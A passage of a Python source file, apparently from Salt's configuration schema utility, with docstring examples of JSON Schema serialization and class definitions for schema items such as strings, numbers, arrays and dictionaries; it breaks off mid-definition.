('title', 'Host Configuration'),\n ('description', 'This is the host configuration'),\n ('type', 'object'),\n ('properties', OrderedDict([\n ('host', {'minimum': 1,\n 'type': 'string',\n 'description': 'The looong host description',\n 'title': 'Host'}),\n ('port', {'description': 'The port number',\n 'default': 80,\n 'inclusiveMinimum': False,\n 'maximum': 65535,\n 'minimum': 0,\n 'type': 'number'})\n ])),\n ('required', ['host']),\n ('x-ordering', ['host', 'port']),\n ('additionalProperties', True)]\n )\n >>> print(salt.utils.json.dumps(HostConfig.serialize(), indent=2))\n {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"title\": \"Host Configuration\",\n \"description\": \"This is the host configuration\",\n \"type\": \"object\",\n \"properties\": {\n \"host\": {\n \"minimum\": 1,\n \"type\": \"string\",\n \"description\": \"The looong host description\",\n \"title\": \"Host\"\n },\n \"port\": {\n \"description\": \"The port number\",\n \"default\": 80,\n \"inclusiveMinimum\": false,\n \"maximum\": 65535,\n \"minimum\": 0,\n \"type\": \"number\"\n }\n },\n \"required\": [\n \"host\"\n ],\n \"x-ordering\": [\n \"host\",\n \"port\"\n ],\n \"additionalProperties\": false\n }\n\n\n The serialized version of the configuration block can be used to validate a\n configuration dictionary using the `python jsonschema library`__.\n\n .. __: https://pypi.python.org/pypi/jsonschema\n\n .. code-block:: python\n\n >>> import jsonschema\n >>> jsonschema.validate({'host': 'localhost', 'port': 80}, HostConfig.serialize())\n >>> jsonschema.validate({'host': 'localhost', 'port': -1}, HostConfig.serialize())\n Traceback (most recent call last):\n File \"\", line 1, in \n File \"/usr/lib/python2.7/site-packages/jsonschema/validators.py\", line 478, in validate\n cls(schema, *args, **kwargs).validate(instance)\n File \"/usr/lib/python2.7/site-packages/jsonschema/validators.py\", line 123, in validate\n raise error\n jsonschema.exceptions.ValidationError: -1 is less than the minimum of 0\n\n Failed validating 'minimum' in schema['properties']['port']:\n {'default': 80,\n 'description': 'The port number',\n 'inclusiveMinimum': False,\n 'maximum': 65535,\n 'minimum': 0,\n 'type': 'number'}\n\n On instance['port']:\n -1\n >>>\n\n\n A configuration document can even be split into configuration sections. Let's reuse the above\n ``HostConfig`` class and include it in a configuration block:\n\n .. code-block:: python\n\n class LoggingConfig(Schema):\n title = 'Logging Configuration'\n description = 'This is the logging configuration'\n\n log_level = StringItem(\n 'Logging Level',\n 'The logging level',\n default='debug',\n minimum=1\n )\n\n class MyConfig(Schema):\n\n title = 'My Config'\n description = 'This my configuration'\n\n hostconfig = HostConfig()\n logconfig = LoggingConfig()\n\n\n The JSON Schema string version of the above is:\n\n .. code-block:: python\n\n >>> print salt.utils.json.dumps(MyConfig.serialize(), indent=4)\n {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"title\": \"My Config\",\n \"description\": \"This my configuration\",\n \"type\": \"object\",\n \"properties\": {\n \"hostconfig\": {\n \"id\": \"https://non-existing.saltstack.com/schemas/hostconfig.json#\",\n \"title\": \"Host Configuration\",\n \"description\": \"This is the host configuration\",\n \"type\": \"object\",\n \"properties\": {\n \"host\": {\n \"minimum\": 1,\n \"type\": \"string\",\n \"description\": \"The looong host description\",\n \"title\": \"Host\"\n },\n \"port\": {\n \"description\": \"The port number\",\n \"default\": 80,\n \"inclusiveMinimum\": false,\n \"maximum\": 65535,\n \"minimum\": 0,\n \"type\": \"number\"\n }\n },\n \"required\": [\n \"host\"\n ],\n \"x-ordering\": [\n \"host\",\n \"port\"\n ],\n \"additionalProperties\": false\n },\n \"logconfig\": {\n \"id\": \"https://non-existing.saltstack.com/schemas/logconfig.json#\",\n \"title\": \"Logging Configuration\",\n \"description\": \"This is the logging configuration\",\n \"type\": \"object\",\n \"properties\": {\n \"log_level\": {\n \"default\": \"debug\",\n \"minimum\": 1,\n \"type\": \"string\",\n \"description\": \"The logging level\",\n \"title\": \"Logging Level\"\n }\n },\n \"required\": [\n \"log_level\"\n ],\n \"x-ordering\": [\n \"log_level\"\n ],\n \"additionalProperties\": false\n }\n },\n \"additionalProperties\": false\n }\n\n >>> import jsonschema\n >>> jsonschema.validate(\n {'hostconfig': {'host': 'localhost', 'port': 80},\n 'logconfig': {'log_level': 'debug'}},\n MyConfig.serialize())\n >>> jsonschema.validate(\n {'hostconfig': {'host': 'localhost', 'port': -1},\n 'logconfig': {'log_level': 'debug'}},\n MyConfig.serialize())\n Traceback (most recent call last):\n File \"\", line 1, in \n File \"/usr/lib/python2.7/site-packages/jsonschema/validators.py\", line 478, in validate\n cls(schema, *args, **kwargs).validate(instance)\n File \"/usr/lib/python2.7/site-packages/jsonschema/validators.py\", line 123, in validate\n raise error\n jsonschema.exceptions.ValidationError: -1 is less than the minimum of 0\n\n Failed validating 'minimum' in schema['properties']['hostconfig']['properties']['port']:\n {'default': 80,\n 'description': 'The port number',\n 'inclusiveMinimum': False,\n 'maximum': 65535,\n 'minimum': 0,\n 'type': 'number'}\n\n On instance['hostconfig']['port']:\n -1\n >>>\n\n If however, you just want to use the configuration blocks for readability\n and do not desire the nested dictionaries serialization, you can pass\n ``flatten=True`` when defining a configuration section as a configuration\n subclass attribute:\n\n .. code-block:: python\n\n class MyConfig(Schema):\n\n title = 'My Config'\n description = 'This my configuration'\n\n hostconfig = HostConfig(flatten=True)\n logconfig = LoggingConfig(flatten=True)\n\n\n The JSON Schema string version of the above is:\n\n .. code-block:: python\n\n >>> print(salt.utils.json.dumps(MyConfig, indent=4))\n {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"title\": \"My Config\",\n \"description\": \"This my configuration\",\n \"type\": \"object\",\n \"properties\": {\n \"host\": {\n \"minimum\": 1,\n \"type\": \"string\",\n \"description\": \"The looong host description\",\n \"title\": \"Host\"\n },\n \"port\": {\n \"description\": \"The port number\",\n \"default\": 80,\n \"inclusiveMinimum\": false,\n \"maximum\": 65535,\n \"minimum\": 0,\n \"type\": \"number\"\n },\n \"log_level\": {\n \"default\": \"debug\",\n \"minimum\": 1,\n \"type\": \"string\",\n \"description\": \"The logging level\",\n \"title\": \"Logging Level\"\n }\n },\n \"x-ordering\": [\n \"host\",\n \"port\",\n \"log_level\"\n ],\n \"additionalProperties\": false\n }\n\"\"\"\n\nimport inspect\nimport textwrap\n\nimport salt.utils.args\n\n# import salt.utils.yaml\nfrom salt.utils.odict import OrderedDict\n\nBASE_SCHEMA_URL = \"https://non-existing.saltstack.com/schemas\"\nRENDER_COMMENT_YAML_MAX_LINE_LENGTH = 80\n\n\nclass NullSentinel:\n \"\"\"\n A class which instance represents a null value.\n Allows specifying fields with a default value of null.\n \"\"\"\n\n def __bool__(self):\n return False\n\n __nonzero__ = __bool__\n\n\nNull = NullSentinel()\n\"\"\"\nA special value that can be used to set the default value\nof a field to null.\n\"\"\"\n\n\n# make sure nobody creates another Null value\ndef _failing_new(*args, **kwargs):\n raise TypeError(\"Can't create another NullSentinel instance\")\n\n\nNullSentinel.__new__ = staticmethod(_failing_new)\ndel _failing_new\n\n\nclass SchemaMeta(type):\n @classmethod\n def __prepare__(mcs, name, bases):\n return OrderedDict()\n\n def __new__(mcs, name, bases, attrs):\n # Mark the instance as a configuration document/section\n attrs[\"__config__\"] = True\n attrs[\"__flatten__\"] = False\n attrs[\"__config_name__\"] = None\n\n # Let's record the configuration items/sections\n items = {}\n sections = {}\n order = []\n # items from parent classes\n for base in reversed(bases):\n if hasattr(base, \"_items\"):\n items.update(base._items)\n if hasattr(base, \"_sections\"):\n sections.update(base._sections)\n if hasattr(base, \"_order\"):\n order.extend(base._order)\n\n # Iterate through attrs to discover items/config sections\n for key, value in attrs.items():\n entry_name = None\n if not hasattr(value, \"__item__\") and not hasattr(value, \"__config__\"):\n continue\n if hasattr(value, \"__item__\"):\n # the value is an item instance\n if hasattr(value, \"title\") and value.title is None:\n # It's an item instance without a title, make the title\n # its name\n value.title = key\n entry_name = value.__item_name__ or key\n items[entry_name] = value\n if hasattr(value, \"__config__\"):\n entry_name = value.__config_name__ or key\n sections[entry_name] = value\n order.append(entry_name)\n\n attrs[\"_order\"] = order\n attrs[\"_items\"] = items\n attrs[\"_sections\"] = sections\n return type.__new__(mcs, name, bases, attrs)\n\n def __call__(cls, flatten=False, allow_additional_items=False, **kwargs):\n instance = object.__new__(cls)\n instance.__config_name__ = kwargs.pop(\"name\", None)\n if flatten is True:\n # This configuration block is to be treated as a part of the\n # configuration for which it was defined as an attribute, not as\n # its own sub configuration\n instance.__flatten__ = True\n if allow_additional_items is True:\n # The configuration block only accepts the configuration items\n # which are defined on the class. On additional items, validation\n # with jsonschema will fail\n instance.__allow_additional_items__ = True\n instance.__init__(**kwargs)\n return instance\n\n\nclass BaseSchemaItemMeta(type):\n \"\"\"\n Config item metaclass to \"tag\" the class as a configuration item\n \"\"\"\n\n @classmethod\n def __prepare__(mcs, name, bases):\n return OrderedDict()\n\n def __new__(mcs, name, bases, attrs):\n # Register the class as an item class\n attrs[\"__item__\"] = True\n attrs[\"__item_name__\"] = None\n # Instantiate an empty list to store the config item attribute names\n attributes = []\n for base in reversed(bases):\n try:\n base_attributes = getattr(base, \"_attributes\", [])\n if base_attributes:\n attributes.extend(base_attributes)\n # Extend the attributes with the base argspec argument names\n # but skip \"self\"\n for argname in salt.utils.args.get_function_argspec(base.__init__).args:\n if argname == \"self\" or argname in attributes:\n continue\n if argname == \"name\":\n continue\n attributes.append(argname)\n except TypeError:\n # On the base object type, __init__ is just a wrapper which\n # triggers a TypeError when we're trying to find out its\n # argspec\n continue\n attrs[\"_attributes\"] = attributes\n return type.__new__(mcs, name, bases, attrs)\n\n def __call__(cls, *args, **kwargs):\n # Create the instance class\n instance = object.__new__(cls)\n if args:\n raise RuntimeError(\n \"Please pass all arguments as named arguments. Un-named \"\n \"arguments are not supported\"\n )\n for key in kwargs.copy():\n # Store the kwarg keys as the instance attributes for the\n # serialization step\n if key == \"name\":\n # This is the item name to override the class attribute name\n instance.__item_name__ = kwargs.pop(key)\n continue\n if key not in instance._attributes:\n instance._attributes.append(key)\n # Init the class\n instance.__init__(*args, **kwargs)\n # Validate the instance after initialization\n for base in reversed(inspect.getmro(cls)):\n validate_attributes = getattr(base, \"__validate_attributes__\", None)\n if validate_attributes:\n if (\n instance.__validate_attributes__.__func__.__code__\n is not validate_attributes.__code__\n ):\n # The method was overridden, run base.__validate_attributes__ function\n base.__validate_attributes__(instance)\n # Finally, run the instance __validate_attributes__ function\n instance.__validate_attributes__()\n # Return the initialized class\n return instance\n\n\nclass Schema(metaclass=SchemaMeta):\n \"\"\"\n Configuration definition class\n \"\"\"\n\n # Define some class level attributes to make PyLint happier\n title = None\n description = None\n _items = _sections = _order = None\n __flatten__ = False\n __allow_additional_items__ = False\n\n @classmethod\n def serialize(cls, id_=None):\n # The order matters\n serialized = OrderedDict()\n if id_ is not None:\n # This is meant as a configuration section, sub json schema\n serialized[\"id\"] = \"{}/{}.json#\".format(BASE_SCHEMA_URL, id_)\n else:\n # Main configuration block, json schema\n serialized[\"$schema\"] = \"http://json-schema.org/draft-04/schema#\"\n if cls.title is not None:\n serialized[\"title\"] = cls.title\n if cls.description is not None:\n if cls.description == cls.__doc__:\n serialized[\"description\"] = textwrap.dedent(cls.description).strip()\n else:\n serialized[\"description\"] = cls.description\n\n required = []\n ordering = []\n serialized[\"type\"] = \"object\"\n properties = OrderedDict()\n cls.after_items_update = []\n for name in cls._order: # pylint: disable=E1133\n skip_order = False\n item_name = None\n if name in cls._sections: # pylint: disable=E1135\n section = cls._sections[name]\n serialized_section = section.serialize(\n None if section.__flatten__ is True else name\n )\n if section.__flatten__ is True:\n # Flatten the configuration section into the parent\n # configuration\n properties.update(serialized_section[\"properties\"])\n if \"x-ordering\" in serialized_section:\n ordering.extend(serialized_section[\"x-ordering\"])\n if \"required\" in serialized_section:\n required.extend(serialized_section[\"required\"])\n if hasattr(section, \"after_items_update\"):\n cls.after_items_update.extend(section.after_items_update)\n skip_order = True\n else:\n # Store it as a configuration section\n properties[name] = serialized_section\n\n if name in cls._items: # pylint: disable=E1135\n config = cls._items[name]\n item_name = config.__item_name__ or name\n # Handle the configuration items defined in the class instance\n if config.__flatten__ is True:\n serialized_config = config.serialize()\n cls.after_items_update.append(serialized_config)\n skip_order = True\n else:\n properties[item_name] = config.serialize()\n\n if config.required:\n # If it's a required item, add it to the required list\n required.append(item_name)\n\n if skip_order is False:\n # Store the order of the item\n if item_name is not None:\n if item_name not in ordering:\n ordering.append(item_name)\n else:\n if name not in ordering:\n ordering.append(name)\n\n if properties:\n serialized[\"properties\"] = properties\n\n # Update the serialized object with any items to include after properties.\n # Do not overwrite properties already existing in the serialized dict.\n if cls.after_items_update:\n after_items_update = {}\n for entry in cls.after_items_update:\n for name, data in entry.items():\n if name in after_items_update:\n if isinstance(after_items_update[name], list):\n after_items_update[name].extend(data)\n else:\n after_items_update[name] = data\n if after_items_update:\n after_items_update.update(serialized)\n serialized = after_items_update\n\n if required:\n # Only include required if not empty\n serialized[\"required\"] = required\n if ordering:\n # Only include ordering if not empty\n serialized[\"x-ordering\"] = ordering\n serialized[\"additionalProperties\"] = cls.__allow_additional_items__\n return serialized\n\n @classmethod\n def defaults(cls):\n serialized = cls.serialize()\n defaults = {}\n for name, details in serialized[\"properties\"].items():\n if \"default\" in details:\n defaults[name] = details[\"default\"]\n continue\n if \"properties\" in details:\n for sname, sdetails in details[\"properties\"].items():\n if \"default\" in sdetails:\n defaults.setdefault(name, {})[sname] = sdetails[\"default\"]\n continue\n return defaults\n\n @classmethod\n def as_requirements_item(cls):\n serialized_schema = cls.serialize()\n required = serialized_schema.get(\"required\", [])\n for name in serialized_schema[\"properties\"]:\n if name not in required:\n required.append(name)\n return RequirementsItem(requirements=required)\n\n # @classmethod\n # def render_as_rst(cls):\n # '''\n # Render the configuration block as a restructured text string\n # '''\n # # TODO: Implement RST rendering\n # raise NotImplementedError\n\n # @classmethod\n # def render_as_yaml(cls):\n # '''\n # Render the configuration block as a parseable YAML string including comments\n # '''\n # # TODO: Implement YAML rendering\n # raise NotImplementedError\n\n\nclass SchemaItem(metaclass=BaseSchemaItemMeta):\n \"\"\"\n Base configuration items class.\n\n All configurations must subclass it\n \"\"\"\n\n # Define some class level attributes to make PyLint happier\n __type__ = None\n __format__ = None\n _attributes = None\n __flatten__ = False\n\n __serialize_attr_aliases__ = None\n\n required = False\n\n def __init__(self, required=None, **extra):\n \"\"\"\n :param required: If the configuration item is required. Defaults to ``False``.\n \"\"\"\n if required is not None:\n self.required = required\n self.extra = extra\n\n def __validate_attributes__(self):\n \"\"\"\n Run any validation check you need the instance attributes.\n\n ATTENTION:\n\n Don't call the parent class when overriding this\n method because it will just duplicate the executions. This class'es\n metaclass will take care of that.\n \"\"\"\n if self.required not in (True, False):\n raise RuntimeError(\"'required' can only be True/False\")\n\n def _get_argname_value(self, argname):\n \"\"\"\n Return the argname value looking up on all possible attributes\n \"\"\"\n # Let's see if there's a private function to get the value\n argvalue = getattr(self, \"__get_{}__\".format(argname), None)\n if argvalue is not None and callable(argvalue):\n argvalue = argvalue() # pylint: disable=not-callable\n if argvalue is None:\n # Let's see if the value is defined as a public class variable\n argvalue = getattr(self, argname, None)\n if argvalue is None:\n # Let's see if it's defined as a private class variable\n argvalue = getattr(self, \"__{}__\".format(argname), None)\n if argvalue is None:\n # Let's look for it in the extra dictionary\n argvalue = self.extra.get(argname, None)\n return argvalue\n\n def serialize(self):\n \"\"\"\n Return a serializable form of the config instance\n \"\"\"\n raise NotImplementedError\n\n\nclass BaseSchemaItem(SchemaItem):\n \"\"\"\n Base configuration items class.\n\n All configurations must subclass it\n \"\"\"\n\n # Let's define description as a class attribute, this will allow a custom configuration\n # item to do something like:\n # class MyCustomConfig(StringItem):\n # '''\n # This is my custom config, blah, blah, blah\n # '''\n # description = __doc__\n #\n description = None\n # The same for all other base arguments\n title = None\n default = None\n enum = None\n enumNames = None\n\n def __init__(\n self,\n title=None,\n description=None,\n default=None,\n enum=None,\n enumNames=None,\n **kwargs\n ):\n \"\"\"\n :param required:\n If the configuration item is required. Defaults to ``False``.\n :param title:\n A short explanation about the purpose of the data described by this item.\n :param description:\n A detailed explanation about the purpose of the data described by this item.\n :param default:\n The default value for this configuration item. May be :data:`.Null` (a special value\n to set the default value to null).\n :param enum:\n A list(list, tuple, set) of valid choices.\n \"\"\"\n if title is not None:\n self.title = title\n if description is not None:\n self.description = description\n if default is not None:\n self.default = default\n if enum is not None:\n self.enum = enum\n if enumNames is not None:\n self.enumNames = enumNames\n super().__init__(**kwargs)\n\n def __validate_attributes__(self):\n if self.enum is not None:\n if not isinstance(self.enum, (list, tuple, set)):\n raise RuntimeError(\n \"Only the 'list', 'tuple' and 'set' python types can be used \"\n \"to define 'enum'\"\n )\n if not isinstance(self.enum, list):\n self.enum = list(self.enum)\n if self.enumNames is not None:\n if not isinstance(self.enumNames, (list, tuple, set)):\n raise RuntimeError(\n \"Only the 'list', 'tuple' and 'set' python types can be used \"\n \"to define 'enumNames'\"\n )\n if len(self.enum) != len(self.enumNames):\n raise RuntimeError(\n \"The size of 'enumNames' must match the size of 'enum'\"\n )\n if not isinstance(self.enumNames, list):\n self.enumNames = list(self.enumNames)\n\n def serialize(self):\n \"\"\"\n Return a serializable form of the config instance\n \"\"\"\n serialized = {\"type\": self.__type__}\n for argname in self._attributes:\n if argname == \"required\":\n # This is handled elsewhere\n continue\n argvalue = self._get_argname_value(argname)\n if argvalue is not None:\n if argvalue is Null:\n argvalue = None\n # None values are not meant to be included in the\n # serialization, since this is not None...\n if (\n self.__serialize_attr_aliases__\n and argname in self.__serialize_attr_aliases__\n ):\n argname = self.__serialize_attr_aliases__[argname]\n serialized[argname] = argvalue\n return serialized\n\n def __get_description__(self):\n if self.description is not None:\n if self.description == self.__doc__:\n return textwrap.dedent(self.description).strip()\n return self.description\n\n # def render_as_rst(self, name):\n # '''\n # Render the configuration item as a restructured text string\n # '''\n # # TODO: Implement YAML rendering\n # raise NotImplementedError\n\n # def render_as_yaml(self, name):\n # '''\n # Render the configuration item as a parseable YAML string including comments\n # '''\n # # TODO: Include the item rules in the output, minimum, maximum, etc...\n # output = '# ----- '\n # output += self.title\n # output += ' '\n # output += '-' * (RENDER_COMMENT_YAML_MAX_LINE_LENGTH - 7 - len(self.title) - 2)\n # output += '>\\n'\n # if self.description:\n # output += '\\n'.join(textwrap.wrap(self.description,\n # width=RENDER_COMMENT_YAML_MAX_LINE_LENGTH,\n # initial_indent='# '))\n # output += '\\n'\n # yamled_default_value = salt.utils.yaml.safe_dump(self.default, default_flow_style=False).split('\\n...', 1)[0]\n # output += '# Default: {0}\\n'.format(yamled_default_value)\n # output += '#{0}: {1}\\n'.format(name, yamled_default_value)\n # output += '# <---- '\n # output += self.title\n # output += ' '\n # output += '-' * (RENDER_COMMENT_YAML_MAX_LINE_LENGTH - 7 - len(self.title) - 1)\n # return output + '\\n'\n\n\nclass NullItem(BaseSchemaItem):\n\n __type__ = \"null\"\n\n\nclass BooleanItem(BaseSchemaItem):\n __type__ = \"boolean\"\n\n\nclass StringItem(BaseSchemaItem):\n \"\"\"\n A string configuration field\n \"\"\"\n\n __type__ = \"string\"\n\n __serialize_attr_aliases__ = {\"min_length\": \"minLength\", \"max_length\": \"maxLength\"}\n\n format = None\n pattern = None\n min_length = None\n max_length = None\n\n def __init__(\n self,\n format=None, # pylint: disable=redefined-builtin\n pattern=None,\n min_length=None,\n max_length=None,\n **kwargs\n ):\n \"\"\"\n :param required:\n If the configuration item is required. Defaults to ``False``.\n :param title:\n A short explanation about the purpose of the data described by this item.\n :param description:\n A detailed explanation about the purpose of the data described by this item.\n :param default:\n The default value for this configuration item. May be :data:`.Null` (a special value\n to set the default value to null).\n :param enum:\n A list(list, tuple, set) of valid choices.\n :param format:\n A semantic format of the string (for example, ``\"date-time\"``, ``\"email\"``, or ``\"uri\"``).\n :param pattern:\n A regular expression (ECMA 262) that a string value must match.\n :param min_length:\n The minimum length\n :param max_length:\n The maximum length\n \"\"\"\n if format is not None: # pylint: disable=redefined-builtin\n self.format = format\n if pattern is not None:\n self.pattern = pattern\n if min_length is not None:\n self.min_length = min_length\n if max_length is not None:\n self.max_length = max_length\n super().__init__(**kwargs)\n\n def __validate_attributes__(self):\n if self.format is None and self.__format__ is not None:\n self.format = self.__format__\n\n\nclass EMailItem(StringItem):\n \"\"\"\n An internet email address, see `RFC 5322, section 3.4.1`__.\n\n .. __: http://tools.ietf.org/html/rfc5322\n \"\"\"\n\n __format__ = \"email\"\n\n\nclass IPv4Item(StringItem):\n \"\"\"\n An IPv4 address configuration field, according to dotted-quad ABNF syntax as defined in\n `RFC 2673, section 3.2`__.\n\n .. __: http://tools.ietf.org/html/rfc2673\n \"\"\"\n\n __format__ = \"ipv4\"\n\n\nclass IPv6Item(StringItem):\n \"\"\"\n An IPv6 address configuration field, as defined in `RFC 2373, section 2.2`__.\n\n .. __: http://tools.ietf.org/html/rfc2373\n \"\"\"\n\n __format__ = \"ipv6\"\n\n\nclass HostnameItem(StringItem):\n \"\"\"\n An Internet host name configuration field, see `RFC 1034, section 3.1`__.\n\n .. __: http://tools.ietf.org/html/rfc1034\n \"\"\"\n\n __format__ = \"hostname\"\n\n\nclass DateTimeItem(StringItem):\n \"\"\"\n An ISO 8601 formatted date-time configuration field, as defined by `RFC 3339, section 5.6`__.\n\n .. __: http://tools.ietf.org/html/rfc3339\n \"\"\"\n\n __format__ = \"date-time\"\n\n\nclass UriItem(StringItem):\n \"\"\"\n A universal resource identifier (URI) configuration field, according to `RFC3986`__.\n\n .. __: http://tools.ietf.org/html/rfc3986\n \"\"\"\n\n __format__ = \"uri\"\n\n\nclass SecretItem(StringItem):\n \"\"\"\n A string configuration field containing a secret, for example, passwords, API keys, etc\n \"\"\"\n\n __format__ = \"secret\"\n\n\nclass NumberItem(BaseSchemaItem):\n\n __type__ = \"number\"\n\n __serialize_attr_aliases__ = {\n \"multiple_of\": \"multipleOf\",\n \"exclusive_minimum\": \"exclusiveMinimum\",\n \"exclusive_maximum\": \"exclusiveMaximum\",\n }\n\n multiple_of = None\n minimum = None\n exclusive_minimum = None\n maximum = None\n exclusive_maximum = None\n\n def __init__(\n self,\n multiple_of=None,\n minimum=None,\n exclusive_minimum=None,\n maximum=None,\n exclusive_maximum=None,\n **kwargs\n ):\n \"\"\"\n :param required:\n If the configuration item is required. Defaults to ``False``.\n :param title:\n A short explanation about the purpose of the data described by this item.\n :param description:\n A detailed explanation about the purpose of the data described by this item.\n :param default:\n The default value for this configuration item. May be :data:`.Null` (a special value\n to set the default value to null).\n :param enum:\n A list(list, tuple, set) of valid choices.\n :param multiple_of:\n A value must be a multiple of this factor.\n :param minimum:\n The minimum allowed value\n :param exclusive_minimum:\n Whether a value is allowed to be exactly equal to the minimum\n :param maximum:\n The maximum allowed value\n :param exclusive_maximum:\n Whether a value is allowed to be exactly equal to the maximum\n \"\"\"\n if multiple_of is not None:\n self.multiple_of = multiple_of\n if minimum is not None:\n self.minimum = minimum\n if exclusive_minimum is not None:\n self.exclusive_minimum = exclusive_minimum\n if maximum is not None:\n self.maximum = maximum\n if exclusive_maximum is not None:\n self.exclusive_maximum = exclusive_maximum\n super().__init__(**kwargs)\n\n\nclass IntegerItem(NumberItem):\n __type__ = \"integer\"\n\n\nclass ArrayItem(BaseSchemaItem):\n __type__ = \"array\"\n\n __serialize_attr_aliases__ = {\n \"min_items\": \"minItems\",\n \"max_items\": \"maxItems\",\n \"unique_items\": \"uniqueItems\",\n \"additional_items\": \"additionalItems\",\n }\n\n items = None\n min_items = None\n max_items = None\n unique_items = None\n additional_items = None\n\n def __init__(\n self,\n items=None,\n min_items=None,\n max_items=None,\n unique_items=None,\n additional_items=None,\n **kwargs\n ):\n \"\"\"\n :param required:\n If the configuration item is required. Defaults to ``False``.\n :param title:\n A short explanation about the purpose of the data described by this item.\n :param description:\n A detailed explanation about the purpose of the data described by this item.\n :param default:\n The default value for this configuration item. May be :data:`.Null` (a special value\n to set the default value to null).\n :param enum:\n A list(list, tuple, set) of valid choices.\n :param items:\n Either of the following:\n * :class:`BaseSchemaItem` -- all items of the array must match the field schema;\n * a list or a tuple of :class:`fields <.BaseSchemaItem>` -- all items of the array must be\n valid according to the field schema at the corresponding index (tuple typing);\n :param min_items:\n Minimum length of the array\n :param max_items:\n Maximum length of the array\n :param unique_items:\n Whether all the values in the array must be distinct.\n :param additional_items:\n If the value of ``items`` is a list or a tuple, and the array length is larger than\n the number of fields in ``items``, then the additional items are described\n by the :class:`.BaseField` passed using this argument.\n :type additional_items: bool or :class:`.BaseSchemaItem`\n \"\"\"\n if items is not None:\n self.items = items\n if min_items is not None:\n self.min_items = min_items\n if max_items is not None:\n self.max_items = max_items\n if unique_items is not None:\n self.unique_items = unique_items\n if additional_items is not None:\n self.additional_items = additional_items\n super().__init__(**kwargs)\n\n def __validate_attributes__(self):\n if not self.items and not self.additional_items:\n raise RuntimeError(\"One of items or additional_items must be passed.\")\n if self.items is not None:\n if isinstance(self.items, (list, tuple)):\n for item in self.items:\n if not isinstance(item, (Schema, SchemaItem)):\n raise RuntimeError(\n \"All items passed in the item argument tuple/list must be \"\n \"a subclass of Schema, SchemaItem or BaseSchemaItem, \"\n \"not {}\".format(type(item))\n )\n elif not isinstance(self.items, (Schema, SchemaItem)):\n raise RuntimeError(\n \"The items argument passed must be a subclass of \"\n \"Schema, SchemaItem or BaseSchemaItem, not \"\n \"{}\".format(type(self.items))\n )\n\n def __get_items__(self):\n if isinstance(self.items, (Schema, SchemaItem)):\n # This is either a Schema or a Basetem, return it in its\n # serialized form\n return self.items.serialize()\n if isinstance(self.items, (tuple, list)):\n items = []\n for item in self.items:\n items.append(item.serialize())\n return items\n\n\nclass DictItem(BaseSchemaItem):\n\n __type__ = \"object\"\n\n __serialize_attr_aliases__ = {\n \"min_properties\": \"minProperties\",\n \"max_properties\": \"maxProperties\",\n \"pattern_properties\": \"patternProperties\",\n \"additional_properties\": \"additionalProperties\",\n }\n\n properties = None\n pattern_properties = None\n additional_properties = None\n min_properties = None\n max_properties = None\n\n def __init__(\n self,\n properties=None,\n pattern_properties=None,\n additional_properties=None,\n min_properties=None,\n max_properties=None,\n **kwargs\n ):\n \"\"\"\n :param required:\n If the configuration item is required. Defaults to ``False``.\n :type required:\n boolean\n :param title:\n A short explanation about the purpose of the data described by this item.\n :type title:\n str\n :param description:\n A detailed explanation about the purpose of the data described by this item.\n :param default:\n The default value for this configuration item. May be :data:`.Null` (a special value\n to set the default value to null).\n :param enum:\n A list(list, tuple, set) of valid choices.\n :param properties:\n A dictionary containing fields\n :param pattern_properties:\n A dictionary whose keys are regular expressions (ECMA 262).\n Properties match against these regular expressions, and for any that match,\n the property is described by the corresponding field schema.\n :type pattern_properties: dict[str -> :class:`.Schema` or\n :class:`.SchemaItem` or :class:`.BaseSchemaItem`]\n :param additional_properties:\n Describes properties that are not described by the ``properties`` or ``pattern_properties``.\n :type additional_properties: bool or :class:`.Schema` or :class:`.SchemaItem`\n or :class:`.BaseSchemaItem`\n :param min_properties:\n A minimum number of properties.\n :type min_properties: int\n :param max_properties:\n A maximum number of properties\n :type max_properties: int\n \"\"\"\n if properties is not None:\n self.properties = properties\n if pattern_properties is not None:\n self.pattern_properties = pattern_properties\n if additional_properties is not None:\n self.additional_properties = additional_properties\n if min_properties is not None:\n self.min_properties = min_properties\n if max_properties is not None:\n self.max_properties = max_properties\n super().__init__(**kwargs)\n\n def __validate_attributes__(self):\n if (\n not self.properties\n and not self.pattern_properties\n and not self.additional_properties\n ):\n raise RuntimeError(\n \"One of properties, pattern_properties or additional_properties must be\"\n \" passed\"\n )\n if self.properties is not None:\n if not isinstance(self.properties, (Schema, dict)):\n raise RuntimeError(\n \"The passed properties must be passed as a dict or \"\n \" a Schema not '{}'\".format(type(self.properties))\n )\n if not isinstance(self.properties, Schema):\n for key, prop in self.properties.items():\n if not isinstance(prop, (Schema, SchemaItem)):\n raise RuntimeError(\n \"The passed property who's key is '{}' must be of type \"\n \"Schema, SchemaItem or BaseSchemaItem, not \"\n \"'{}'\".format(key, type(prop))\n )\n if self.pattern_properties is not None:\n if not isinstance(self.pattern_properties, dict):\n raise RuntimeError(\n \"The passed pattern_properties must be passed as a dict \"\n \"not '{}'\".format(type(self.pattern_properties))\n )\n for key, prop in self.pattern_properties.items():\n if not isinstance(prop, (Schema, SchemaItem)):\n raise RuntimeError(\n \"The passed pattern_property who's key is '{}' must \"\n \"be of type Schema, SchemaItem or BaseSchemaItem, \"\n \"not '{}'\".format(key, type(prop))\n )\n if self.additional_properties is not None:\n if not isinstance(self.additional_properties, (bool, Schema, SchemaItem)):\n raise RuntimeError(\n \"The passed additional_properties must be of type bool, \"\n \"Schema, SchemaItem or BaseSchemaItem, not '{}'\".format(\n type(self.pattern_properties)\n )\n )\n\n def __get_properties__(self):\n if self.properties is None:\n return\n if isinstance(self.properties, Schema):\n return self.properties.serialize()[\"properties\"]\n properties = OrderedDict()\n for key, prop in self.properties.items():\n properties[key] = prop.serialize()\n return properties\n\n def __get_pattern_properties__(self):\n if self.pattern_properties is None:\n return\n pattern_properties = OrderedDict()\n for key, prop in self.pattern_properties.items():\n pattern_properties[key] = prop.serialize()\n return pattern_properties\n\n def __get_additional_properties__(self):\n if self.additional_properties is None:\n return\n if isinstance(self.additional_properties, bool):\n return self.additional_properties\n return self.additional_properties.serialize()\n\n def __call__(self, flatten=False):\n self.__flatten__ = flatten\n return self\n\n def serialize(self):\n result = super().serialize()\n required = []\n if self.properties is not None:\n if isinstance(self.properties, Schema):\n serialized = self.properties.serialize()\n if \"required\" in serialized:\n required.extend(serialized[\"required\"])\n else:\n for key, prop in self.properties.items():\n if prop.required:\n required.append(key)\n if required:\n result[\"required\"] = required\n return result\n\n\nclass 